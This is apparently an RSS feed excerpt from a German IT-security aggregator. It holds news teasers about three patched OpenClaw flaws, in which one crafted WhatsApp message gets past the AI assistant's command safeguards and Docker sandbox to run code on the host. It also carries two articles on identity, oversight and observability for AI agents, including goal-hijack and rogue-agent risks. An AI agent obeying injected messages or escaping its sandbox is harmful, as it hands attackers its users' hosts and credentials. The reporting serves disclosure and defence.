<guid isPermaLink="true">https://tsecurity.de/de/3663917/downloads/v202671-beta6/</guid>
<pubDate>Mon, 13 Jul 2026 00:31:42 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.1-beta.6</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.1-beta.5]]></title>
<description><![CDATA[OpenClaw 2026.7.1-beta.5]]></description>
<link>https://tsecurity.de/de/3661666/downloads/v202671-beta5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661666/downloads/v202671-beta5/</guid>
<pubDate>Sat, 11 Jul 2026 12:17:05 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.1-beta.5</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-10 21h : 5 posts]]></title>
<description><![CDATA[5 posts were published in the last hour 18:32 : Top 6 Managed Detection and Response Providers 18:32 : Top 10 Best Unified Threat Management (UTM) Solutions in 2026 18:32 : One WhatsApp Message Turns OpenClaw Into a Remote Access…
Read more →
The post IT Security News Hourly Summary 2026-07-10 21...]]></description>
<link>https://tsecurity.de/de/3660653/it-security-nachrichten/it-security-news-hourly-summary-2026-07-10-21h-5-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660653/it-security-nachrichten/it-security-news-hourly-summary-2026-07-10-21h-5-posts/</guid>
<pubDate>Fri, 10 Jul 2026 21:08:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>5 posts were published in the last hour 18:32 : Top 6 Managed Detection and Response Providers 18:32 : Top 10 Best Unified Threat Management (UTM) Solutions in 2026 18:32 : One WhatsApp Message Turns OpenClaw Into a Remote Access…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-10-21h-5-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-10-21h-5-posts/">IT Security News Hourly Summary 2026-07-10 21h : 5 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One WhatsApp Message Turns OpenClaw Into a Remote Access Tool for Hackers]]></title>
<description><![CDATA[Three high-severity vulnerabilities in OpenClaw, the open-source AI coding assistant with 381,000 GitHub stars, that allow attackers to achieve remote code execution through a single WhatsApp message. The flaws, confirmed exploitable on OpenClaw 2026.6.1, expose a structural weakness in how…
Read...]]></description>
<link>https://tsecurity.de/de/3660618/it-security-nachrichten/one-whatsapp-message-turns-openclaw-into-a-remote-access-tool-for-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660618/it-security-nachrichten/one-whatsapp-message-turns-openclaw-into-a-remote-access-tool-for-hackers/</guid>
<pubDate>Fri, 10 Jul 2026 20:35:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Three high-severity vulnerabilities in OpenClaw, the open-source AI coding assistant with 381,000 GitHub stars, that allow attackers to achieve remote code execution through a single WhatsApp message. The flaws, confirmed exploitable on OpenClaw 2026.6.1, expose a structural weakness in how…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/one-whatsapp-message-turns-openclaw-into-a-remote-access-tool-for-hackers/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/one-whatsapp-message-turns-openclaw-into-a-remote-access-tool-for-hackers/">One WhatsApp Message Turns OpenClaw Into a Remote Access Tool for Hackers</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Vulnerabilities Let Attackers Turn WhatsApp Messages Into Host-Level Code Execution]]></title>
<description><![CDATA[Security researchers have disclosed three high-severity vulnerabilities in OpenClaw, the popular open-source AI coding assistant with over 381,000 GitHub stars, that allow attackers to achieve full remote code execution using nothing more than a cleverly worded WhatsApp message. The flaws bypass ...]]></description>
<link>https://tsecurity.de/de/3660504/it-security-nachrichten/openclaw-vulnerabilities-let-attackers-turn-whatsapp-messages-into-host-level-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660504/it-security-nachrichten/openclaw-vulnerabilities-let-attackers-turn-whatsapp-messages-into-host-level-code-execution/</guid>
<pubDate>Fri, 10 Jul 2026 19:40:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Security researchers have disclosed three high-severity vulnerabilities in OpenClaw, the popular open-source AI coding assistant with over 381,000 GitHub stars, that allow attackers to achieve full remote code execution using nothing more than a cleverly worded WhatsApp message. The flaws bypass the tool’s environment variable sanitization, its command execution safeguards, and its Docker sandbox isolation […]</p>
<p>The post <a href="https://cyberpress.org/openclaw-remote-access-tool/">OpenClaw Vulnerabilities Let Attackers Turn WhatsApp Messages Into Host-Level Code Execution</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[One WhatsApp Message Turns OpenClaw Into a Remote Access Tool for Hackers]]></title>
<description><![CDATA[Three high-severity vulnerabilities in OpenClaw, the open-source AI coding assistant with 381,000 GitHub stars, that allow attackers to achieve remote code execution through a single WhatsApp message. The flaws, confirmed exploitable on OpenClaw 2026.6.1, expose a structural weakness in how AI ag...]]></description>
<link>https://tsecurity.de/de/3660479/it-security-nachrichten/one-whatsapp-message-turns-openclaw-into-a-remote-access-tool-for-hackers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660479/it-security-nachrichten/one-whatsapp-message-turns-openclaw-into-a-remote-access-tool-for-hackers/</guid>
<pubDate>Fri, 10 Jul 2026 19:29:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Three high-severity vulnerabilities in OpenClaw, the open-source AI coding assistant with 381,000 GitHub stars, that allow attackers to achieve remote code execution through a single WhatsApp message. The flaws, confirmed exploitable on OpenClaw 2026.6.1, expose a structural weakness in how AI agents handle untrusted input from messaging channels. OpenClaw is a self-hosted AI assistant that […]</p>
<p>The post <a href="https://cybersecuritynews.com/whatsapp-message-openclaw-remote-access-tool/">One WhatsApp Message Turns OpenClaw Into a Remote Access Tool for Hackers</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw: WhatsApp-zu-Host-Angriffskette über drei gepatchte KI-Sicherheitslücken]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Offenbar lassen sich über WhatsApp an eine KI-Assistenten-Instanz Nachrichten senden, die im schlimmsten Fall Code auf dem Host ausführen. Auslöser sind drei inzwischen gepatchte OpenClaw-Sicherheitslücken mit CVSS-Werten bis zu 8, 8, darunter Command-Injection und ein Pfad...]]></description>
<link>https://tsecurity.de/de/3660373/it-security-nachrichten/openclaw-whatsapp-zu-host-angriffskette-ueber-drei-gepatchte-ki-sicherheitsluecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660373/it-security-nachrichten/openclaw-whatsapp-zu-host-angriffskette-ueber-drei-gepatchte-ki-sicherheitsluecken/</guid>
<pubDate>Fri, 10 Jul 2026 18:33:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/openclaw-whatsapp-zu-host-attack-chain-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Offenbar lassen sich über WhatsApp an eine KI-Assistenten-Instanz Nachrichten senden, die im schlimmsten Fall Code auf dem Host ausführen. Auslöser sind drei inzwischen gepatchte OpenClaw-Sicherheitslücken mit CVSS-Werten bis zu 8, 8, darunter Command-Injection und ein Pfad-Umgehungsproblem bei Bind-Mounts. Für Unternehmen ist die Nachricht besonders relevant, weil die praktische Auswirkung stark von […]</p>
<div><a href="https://www.it-boltwise.de/openclaw-whatsapp-zu-host-angriffskette-ueber-drei-gepatchte-ki-sicherheitsluecken.html">... den vollständigen Artikel <strong>»OpenClaw: WhatsApp-zu-Host-Angriffskette über drei gepatchte KI-Sicherheitslücken«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/openclaw-whatsapp-zu-host-angriffskette-ueber-drei-gepatchte-ki-sicherheitsluecken.html">OpenClaw: WhatsApp-zu-Host-Angriffskette über drei gepatchte KI-Sicherheitslücken</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Details WhatsApp-to-Host Attack Chain Using Three OpenClaw Flaws]]></title>
<description><![CDATA[Details have emerged about three now-patched security flaws in the OpenClaw personal artificial intelligence (AI) assistant that, if successfully exploited, could enable credential theft, privilege escalation, and arbitrary code execution on the host. A brief description of the high-severity vuln...]]></description>
<link>https://tsecurity.de/de/3660167/it-security-nachrichten/researcher-details-whatsapp-to-host-attack-chain-using-three-openclaw-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660167/it-security-nachrichten/researcher-details-whatsapp-to-host-attack-chain-using-three-openclaw-flaws/</guid>
<pubDate>Fri, 10 Jul 2026 17:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Details have emerged about three now-patched security flaws in the OpenClaw personal artificial intelligence (AI) assistant that, if successfully exploited, could enable credential theft, privilege escalation, and arbitrary code execution on the host. A brief description of the high-severity vulnerabilities…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/researcher-details-whatsapp-to-host-attack-chain-using-three-openclaw-flaws/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/researcher-details-whatsapp-to-host-attack-chain-using-three-openclaw-flaws/">Researcher Details WhatsApp-to-Host Attack Chain Using Three OpenClaw Flaws</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Details WhatsApp-to-Host Attack Chain Using Three OpenClaw Flaws]]></title>
<description><![CDATA[Details have emerged about three now-patched security flaws in the OpenClaw personal artificial intelligence (AI) assistant that, if successfully exploited, could enable credential theft, privilege escalation, and arbitrary code execution on the host.

A brief description of the high-severity vul...]]></description>
<link>https://tsecurity.de/de/3660075/it-security-nachrichten/researcher-details-whatsapp-to-host-attack-chain-using-three-openclaw-flaws/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660075/it-security-nachrichten/researcher-details-whatsapp-to-host-attack-chain-using-three-openclaw-flaws/</guid>
<pubDate>Fri, 10 Jul 2026 16:54:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Details have emerged about three now-patched security flaws in the OpenClaw personal artificial intelligence (AI) assistant that, if successfully exploited, could enable credential theft, privilege escalation, and arbitrary code execution on the host.

A brief description of the high-severity vulnerabilities is as follows -


  GHSA-hjr6-g723-hmfm (CVSS score: 8.8) - An operating system]]></content:encoded>
</item>
<item>
<title><![CDATA[Running OpenClaw with Ollama]]></title>
<description><![CDATA[This article covers the full path from zero to a running private research assistant on Telegram, including configuring the context length correctly, connecting the channel, enabling web search, and deploying it headlessly in Docker.]]></description>
<link>https://tsecurity.de/de/3657295/ai-nachrichten/running-openclaw-with-ollama/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657295/ai-nachrichten/running-openclaw-with-ollama/</guid>
<pubDate>Thu, 09 Jul 2026 16:03:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This article covers the full path from zero to a running private research assistant on Telegram, including configuring the context length correctly, connecting the channel, enabling web search, and deploying it headlessly in Docker.]]></content:encoded>
</item>
<item>
<title><![CDATA[I Tried Windscribe's OpenClaw Integration. It’s a (Small) Step in the Right Direction]]></title>
<description><![CDATA[There’s still a long way to go before it’s a useful feature for most VPN users.]]></description>
<link>https://tsecurity.de/de/3657065/it-nachrichten/i-tried-windscribes-openclaw-integration-its-a-small-step-in-the-right-direction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657065/it-nachrichten/i-tried-windscribes-openclaw-integration-its-a-small-step-in-the-right-direction/</guid>
<pubDate>Thu, 09 Jul 2026 14:48:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[There’s still a long way to go before it’s a useful feature for most VPN users.]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI identity: A 6-stage maturity model for non-human identities]]></title>
<description><![CDATA[In a client engagement last year, an LLM-based deployment agent with standing access to a production Kubernetes cluster triggered a four-hour outage through a malformed configuration push. In the IAM, the agent appeared as a service account with a long-lived API key, no MFA, no scoped revocation ...]]></description>
<link>https://tsecurity.de/de/3656659/it-security-nachrichten/agentic-ai-identity-a-6-stage-maturity-model-for-non-human-identities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656659/it-security-nachrichten/agentic-ai-identity-a-6-stage-maturity-model-for-non-human-identities/</guid>
<pubDate>Thu, 09 Jul 2026 12:24:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In a client engagement last year, an LLM-based deployment agent with standing access to a production Kubernetes cluster triggered a four-hour outage through a malformed configuration push. In the IAM, the agent appeared as a service account with a long-lived API key, no MFA, no scoped revocation path. When the incident review team asked which human had authorized the agent’s last action, no one in the room could answer. I have watched a version of that question go unanswered in three engagements over the past year, in three different sectors, with three different vendor stacks.</p>



<p>Every CISO deck right now contains a slide about agentic AI. Far fewer contain a slide about who, in identity terms, these agents actually are. That gap is the more dangerous one. The first slide is a strategy question. The second is a control question — and it is the one your auditors, your incident responders and your board will eventually ask. <a href="https://www.gartner.com/en/newsroom/press-releases/2026-02-05-gartner-identifies-the-top-cybersecurity-trends-for-2026">Gartner’s Top Cybersecurity Trends 2026</a>, published by Director Analyst Alex Michaels, names both halves of that gap — agentic AI oversight (Trend 1) and IAM adaptation to AI agents (Trend 4) — as the forces redefining cyber risk this year.</p>



<p>This piece sets out a six-stage maturity model for non-human and agent-based identities (NHIs), the six minimum requirements that have to be met before any production deployment is defensible and the single most consequential reporting decision in the access-and-identity dimension: refusing the arithmetic mean across human and non-human identity governance.</p>



<h2 class="wp-block-heading">Why agent-based systems break the existing identity model</h2>



<p>A conventional service account performs a narrow, predictable task: it fetches a backup, runs a scheduled report, signs a build artifact. Its scope is fixed at design time. The controls around it — rotation, vaulting, audit — are well-understood.</p>



<p>An agent-based system does not work this way. It receives an intent, decomposes it into steps, calls whichever tools or APIs it judges appropriate and produces an outcome that was not specified action-by-action in advance. KuppingerCole’s 2026 Leadership Compass on Non-Human Identity Management notes that NHIs now outnumber human users in many enterprise environments, in some cases by a factor of 25 to 50. The same compass, authored under Principal Analyst Martin Kuppinger, observes that the tooling built around joiner-mover-leaver lifecycles was never designed to discover, attribute or govern these identities at that scale.</p>



<p>The <a href="https://genai.owasp.org/">OWASP GenAI Security Project</a> has catalogued the resulting attack surface in two iterations — the Agentic AI Threats &amp; Mitigations taxonomy in February 2025 and the more operational OWASP Top 10 for Agentic Applications later that year, categories ASI01 through ASI10. The notable finding is that three of the four highest-rated risks are identity questions: tool misuse and exploitation (ASI02), identity and privilege abuse including delegated and inherited trust (ASI03) and rogue agents that act outside their intended behavior (ASI10). A fourth, agentic supply chain vulnerabilities (ASI04), is identity adjacent.</p>



<p>CISA’s first joint Five Eyes advisory on the topic — <a href="https://www.cisa.gov/resources-tools/resources/careful-adoption-agentic-ai-services">Careful Adoption of Agentic AI Services</a>, published 1 May 2026 with NSA, the Australian Signals Directorate’s ACSC, the Canadian Centre for Cyber Security, NCSC-NZ and NCSC-UK — converges on the same conclusion. Privilege risk is named the foundational concern. The Center for Internet Security followed with its own report on prompt injection as the top compounding risk in April 2026, and NIST’s AI Agent Standards Initiative, launched February 2026, is now drafting the formal standards that will sit alongside this guidance.</p>



<p>In other words, the dominant risk class introduced by agentic AI is not novel cryptography or some new exploit primitive. It is the unbounded scope of an identity that the existing IAM model was never asked to govern.</p>



<h2 class="wp-block-heading">Six minimum requirements before any agent goes to production</h2>



<p>Before any maturity discussion is useful, there is a floor. The following six requirements mark the line below which an agent-based system is not responsibly deployable in an enterprise environment. They are derived from incidents and audit findings I have collected across pharma, energy, finance and manufacturing engagements, and they are technically feasible on modern IAM and PAM platforms — though rarely on the IAM stacks most enterprises actually have today.</p>



<ul class="wp-block-list">
<li>Each agent receives a uniquely attributable non-human identity. Shared service accounts across multiple agents, or shared between an agent and a human administrator, are not acceptable.</li>



<li>Permissions are granted under an on-behalf-of model. The agent acts on the authority of a named human principal, inheriting that principal’s permissions, scoped to a defined purpose. It never acts from its own standing authority.</li>



<li>No long-lived credentials. No API key valid for more than an hour. No embedded secrets in code. Short-lived, context-bound credentials only, revocable on anomaly.</li>



<li>Complete audit trail through SIEM integration. Every agent action is logged with timestamp, executing identity, instructing human principal, input context and outcome.</li>



<li>Continuous re-authentication. For long-running agents, identity is re-validated risk-based at regular intervals — not just at session start.</li>



<li>Real-time revocation. The capability to disconnect an agent from systems within seconds is not optional. It is the only control that actually contains an agent-based incident in flight.</li>
</ul>



<p>An organization that cannot meet all six does not have an agent governance problem. It has a deployment readiness problem. The model below assumes these are in place by Stage 3; anything earlier is the discovery phase.</p>



<h2 class="wp-block-heading">The six-stage NHI maturity model</h2>



<p>Most enterprise maturity scales measure the access-and-identity dimension against the yardstick of human identity: is there central IAM, is MFA enforced for privileged access, does the joiner-mover-leaver lifecycle work? These remain the right questions, but they stop short. An organization that scores Stage 4 on human identity governance and Stage 1 on agent governance does not have a mature identity practice. It has a well-lit half and a blind half.</p>



<p>The following six-stage scale is cumulative — each stage assumes everything below it. The threshold of responsibility sits at Stage 3. In my view, production deployment of agent-based systems below Stage 3 is not defensible to a board, a regulator or an incident review.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>Stage</strong></td><td><strong>Label</strong></td><td><strong>Criterion for non-human / agent-based identities</strong></td><td><strong>Audit survivability</strong></td></tr></thead><tbody><tr><td><strong>0</strong></td><td><strong>Unrecognized</strong></td><td>Non-human identities exist but are not in the inventory. Shared service accounts, long-lived keys, no audit trail.</td><td>No — agent activity is invisible to forensics.</td></tr><tr><td><strong>1</strong></td><td><strong>Visible</strong></td><td>Identities are inventoried and assigned to an asset class, but not yet under independent governance.</td><td>No — no per-agent accountability.</td></tr><tr><td><strong>2</strong></td><td><strong>Unique</strong></td><td>Each identity is uniquely attributable (no shared accounts); initial lifecycle rules exist but are applied inconsistently.</td><td>Partial — who acted is answerable; on whose authority is not.</td></tr><tr><td><strong>3</strong></td><td><strong>Controlled</strong></td><td>The six minimum requirements are fully met: on-behalf-of model, short-lived credentials, SIEM audit trail, real-time revocation.</td><td>Yes — minimum defensible posture.</td></tr><tr><td><strong>4</strong></td><td><strong>Bounded and monitored</strong></td><td>The agent’s action is bounded; every action is reviewable and — where the process allows — reversible. Agent activity metrics are evaluated, not just collected.</td><td>Yes — containment is provable.</td></tr><tr><td><strong>5</strong></td><td><strong>Self-regulating</strong></td><td>Anomalies in agent behavior are detected automatically and trigger risk-based pause or revocation. Each agent has a named accountable owner.</td><td>Yes — state of the art.</td></tr></tbody></table> </div></figure>



<p>Stages 4 and 5 deserve unpacking because they are where the model departs from access control and begins to govern behavior. Bounded means the agent’s mandate has explicit limits it cannot act outside of. Reviewable means every action is logged with intent, execution and result. Reversible means an action can be rolled back before it produces irreversible effect — a hard constraint in any environment where actions touch physical processes, financial transactions or external commitments. Self-regulating means the system detects anomalies in agent behavior and intervenes before a human reasonably could.</p>



<h2 class="wp-block-heading">The ‘human in the loop’ is not automatically governance</h2>



<p>One misconception consistently overrates organizations’ agent governance. The presence of a human in the decision loop is widely treated as sufficient oversight. It is not. If a human is asked to approve hundreds or thousands of agent actions without the time to inspect each one, what exists is not control but an approval automation with a human signature on it. Human review does not scale to the action volume of an autonomous system.</p>



<p>A mature governance posture acknowledges this. It moves control from per-action approval to structural constraint: bound what the agent can do at all, monitor its behavior for anomaly and ensure that oversight is loyal to the principal, not to the executing system. An organization that rests its agent governance entirely on human per-action approvals does not reach Stage 4 of the model, regardless of how thoroughly those approvals are documented. Stage 4 requires structural bounding, not scaling handwork.</p>



<h2 class="wp-block-heading">OWASP as an audit-ready evidence base</h2>



<p>Maturity assessment risks drifting into subjective self-rating. The OWASP categories cited above can be operationalized into audit questions that anchor each stage in checkable evidence:</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><thead><tr><td><strong>OWASP attack surface (Top 10 for agentic applications)</strong></td><td><strong>Audit question for maturity assessment</strong></td><td><strong>Met from stage</strong></td></tr></thead><tbody><tr><td>ASI03 — Identity and privilege abuse</td><td>Does each agent have a unique identity, with no shared accounts?</td><td><strong>2</strong></td></tr><tr><td>ASI02 — Tool misuse and exploitation</td><td>Are the interfaces an agent is permitted to use explicitly bounded?</td><td><strong>4</strong></td></tr><tr><td>ASI01 — Goal hijack</td><td>Is each agent’s mandate clearly bounded and protected against manipulation?</td><td><strong>4</strong></td></tr><tr><td>ASI04 — Agentic supply chain vulnerability</td><td>Is the agent’s software composition documented via SBOM?</td><td><strong>4</strong></td></tr><tr><td>ASI10 — Rogue agent</td><td>Are anomalies in agent behavior detected and routed to pause or revoke?</td><td><strong>5</strong></td></tr></tbody></table> </div></figure>



<p>The column on the right matters. A common rating error is to grade an organization high because it has handled the easy requirements — unique identities, basic logging — without addressing the demanding ones. Tying the upper stages to the difficult criteria prevents that inflation.</p>



<h2 class="wp-block-heading">Report human and non-human identity separately</h2>



<p>The single most consequential reporting decision is to refuse the arithmetic mean. The access-and-identity dimension on a maturity radar should not collapse a Stage 4 human-identity practice and a Stage 1 agent-identity practice into a reassuring middle number. Both ratings belong on the same axis, but they belong reported separately.</p>



<p>A representative finding from current engagements: human identity governance at Stage 4 — central IAM, MFA, lifecycle managed — and agent governance at Stage 1, with agents recently inventoried but still authenticating via long-lived API keys against shared service accounts, without their own audit trail. The combined average would read Stage 2 to 3 and look acceptable. The separate reporting reveals that the unmanaged half is precisely the identity class with the largest and least predictable scope of action. That visibility is what triggers the prioritized roadmap action; an aggregated score buries it.</p>



<h2 class="wp-block-heading">The named-accountable-owner test</h2>



<p>If I run only one diagnostic in a new engagement, this is the one. For every production agent-based system in the environment, ask: who, by name, is accountable if this agent causes harm? An agent without a named accountable owner is the non-human counterpart of the workstation everyone uses, and no one owns. Stage 5 of the model formally requires a named accountable owner per deployed agent. The reason is operational, not bureaucratic: the question ‘who is responsible for this system?’ must be answered before the incident, not during it.</p>



<p>In practice, that accountability binds best to the role that already carries the operational risk of the affected process — typically the asset owner in the business function. Anchoring it there prevents agent-based systems from drifting into the organizational gray zone between IT, security and the business, which is exactly where unattributed action originates.</p>



<p>The maturity model in this article is a starting structure. The honest first step in adopting it is not to score well. It is to score truthfully, report human and non-human identity governance separately and treat the gap between them as the first item on the security roadmap for the agentic-AI period — before the next agent goes to production.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Three keys to deploying AI agents]]></title>
<description><![CDATA[Building an agent in an afternoon is now within reach of almost anyone in the enterprise with a credit card. The tools are accessible, the deployments are easy. The hard part is delivering the intended results.



Gartner predicts that more than 40% of agentic AI projects will be canceled by 2027...]]></description>
<link>https://tsecurity.de/de/3656433/ai-nachrichten/three-keys-to-deploying-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656433/ai-nachrichten/three-keys-to-deploying-ai-agents/</guid>
<pubDate>Thu, 09 Jul 2026 11:03:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Building an agent in an afternoon is now within reach of almost anyone in the enterprise with a credit card. The tools are accessible, the deployments are easy. The hard part is delivering the intended results.</p>



<p>Gartner predicts that more than <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-25-gartner-predicts-over-40-percent-of-agentic-ai-projects-will-be-canceled-by-end-of-2027">40% of agentic AI projects will be canceled</a> by 2027, and the <a href="https://artificialintelligenceact.eu/article/14/">EU AI Act Article 14</a> requirements for human oversight for high-risk AI systems take effect on August 2, 2026. The deciding factor for whether agentic AI reaches production isn’t the model, the framework, or the use case. It’s the infrastructure beneath the agent: the part the people building agents have never had to think about.</p>



<p>Organizations are racing to deploy agentic AI to stay competitive, which means pressure-testing is often overlooked. Every agent project should be scrutinized by three executives asking three different sets of questions. The CISO asks whether we are exposed. The CFO asks whether we are overspending. The chief AI officer asks whether we are getting value. </p>



<p>As a product leader focused on AI governance, I see this pattern across customer environments. Three architecture layers answer those three questions: identity, observability, and cost optimization. I’ll walk through each of the layers and provide a four-question diagnostic for the next production push.</p>



<h2 class="wp-block-heading">Why AI pilots stall</h2>



<p>An agent is not a faster chatbot. It chains dozens of steps, calls external tools, retains state across sessions, and triggers real-world actions. Most inherit the credentials of whoever deployed them. They operate at machine speed without context for the consequences of each step.</p>



<p>The mismatch is not a competence gap on the human side. It is a time-horizon gap. An engineer reasons about a database change over hours. An agent triggers a hundred of them before anyone reviews the first. Traditional audit logging captures request and response. That does not catch this pattern.</p>



<p>When something breaks, the cost is rarely the incident. It is the months of stalled deployment that follow. The risk committee freezes pilots. The productivity gains the program was supposed to deliver never materialize. Finance still gets the API bill. Three architecture layers decide whether a deployment survives that pattern. Each one is the answer to a question the people building agents never had to ask.</p>



<h2 class="wp-block-heading">Layer 1: Identity for non-human actors</h2>



<p>Start with identity. The default failure looks routine: a product manager with broad API access spawns an agent that inherits the full scope of those credentials and runs at machine speed across systems no one inventoried.</p>



<p>The scale is bigger than most teams realize. <a href="https://www.signisys.com/blog/non-human-identities-outnumber-users-100-to-1-the-cloud-security-crisis-no-one-is-talking-about/">Industry IAM research</a> puts non-human identities at more than 100 to 1 versus human accounts, with <a href="https://www.cybersecuritytribe.com/news/research-reveals-44-growth-in-nhis-from-2024-to-2025">some 2026 surveys</a> putting the ratio as high as 144 to 1. A <a href="https://www.orchid.security/reports/the-identity-gap-2026-snapshot-identity-insight-straight-from-the-source">May 2026 Identity Gap Report</a> found two-thirds are unseen and unmanaged.</p>



<p>Agents are moving from human identities with their “owners”’ permissions to first-class principals. They are purpose-bound, cryptographically attested, and scoped to one task at a time. Google’s Agent Identity, built on SPIFFE, is one early example. The production pattern has three properties. Credentials are issued per agent task. Token lifetime is measured in minutes to hours, not weeks. Scope is narrowed to the specific tools and data classes the task requires, and the credential revokes automatically on task completion.</p>



<p>If a single static credential is good for a week and 50 different tasks, you are not running agentic AI. You are running a service account with extra steps.</p>



<h2 class="wp-block-heading">Layer 2: Observability that serves all three executives</h2>



<p>Identity controls what an agent can do. Observability shows what it’s actually doing. One instrumentation layer, three views.</p>



<p>First, the security view. Traditional logging captures request and response, which assumes one human action per logged event. An agent’s unit of work is a chain. Pick a tool, call it, read the result, decide the next step. Twenty steps, some of them writing to production. Instrument every step as a durable audit object, independently queryable. Understand which tool was invoked, what data was accessed, what policy applied, and what the agent reasoned to justify the next step. That’s what Article 14 oversight requires for production.</p>



<p>Second, the business-outcomes view. Audit objects answer the CISO. The chief AI officer asks a different question. Is the agent accomplishing what we deployed it for, or burning compute on a tangent? An agent can run 200 tool calls, generate clean audit logs, and produce nothing. It might be looping on a sub-goal that drifted three steps back. Observe each step against the declared business purpose: on-task ratio, sub-goal coherence, progress markers. Project management telemetry for a non-human worker.</p>



<p>Third, the cost view. The same per-step instrumentation produces cost telemetry: token count per step, model per call, context size per turn, downstream tool-call costs. Without that attribution, the next section’s optimizations are blind.</p>



<p>A busy agent and a productive agent look identical in the security log. They look identical on the bill too. The difference shows up only when all three views run from the same instrumentation.</p>



